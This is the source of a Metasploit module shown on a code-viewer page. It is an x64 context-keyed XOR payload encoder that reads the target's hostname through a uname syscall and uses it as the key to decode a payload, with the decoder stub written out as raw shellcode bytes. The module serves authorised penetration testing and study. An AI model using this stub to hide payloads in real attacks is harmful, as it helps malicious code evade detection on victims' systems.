Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.
Path: blob/master/modules/encoders/x64/xor_context.rb
Views: 11779
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Encoder::Xor67def initialize8super(9'Name' => 'Hostname-based Context Keyed Payload Encoder',10'Description' => 'Context-Keyed Payload Encoder based on hostname and x64 XOR encoder.',11'Author' => [ 'sf' 'oso' ],12'Arch' => ARCH_X64,13'License' => MSF_LICENSE,14'Platform' => 'linux',15'Decoder' =>16{17'KeySize' => 8,18'KeyPack' => 'Q',19'BlockSize' => 8,20}21)2223register_options([ OptString.new('C_HOSTNAME',[ true, "Context Hostname.", "hostname"])])24end2526def obtain_key(buf, badchars, state)27# TODO: Currently only first 8 chars are taken as key. We should include the other chars in the key.28state.key = datastore['C_HOSTNAME'][0..8].reverse!.unpack('H*')[0].to_i(base=16)29end3031def decoder_stub( state )32# calculate the (negative) block count . We should check this against state.badchars.33block_count = [-( ( (state.buf.length - 1) / state.decoder_key_size) + 1)].pack( "V" )3435decoder = ""+36# get hostname37"\x6a\x3f\x58" + # push 0x3f; pop rax38"\x48\x8D\x3C\x24" + # lea rdi, [rsp]39"\x0F\x05" + # syscall ; LINUX - sys_uname40"\x48\x8B\x5F\x41" + # movq rbx, [rdi+0x41]; hostname4142# loop43"\x48\x31\xC9" + # xor rcx, rcx44"\x48\x81\xE9" + block_count + # sub ecx, block_count45"\x48\x8D\x05\xEF\xFF\xFF\xFF" + # lea rax, [rip - 0x01]46"\x48\x31\x58\x1d" + # xor [rax+0x1d], rbx47"\x48\x2D\xF8\xFF\xFF\xFF" + # sub rax, -848"\xE2\xF4" # loop 0x1B49return decoder50end51end525354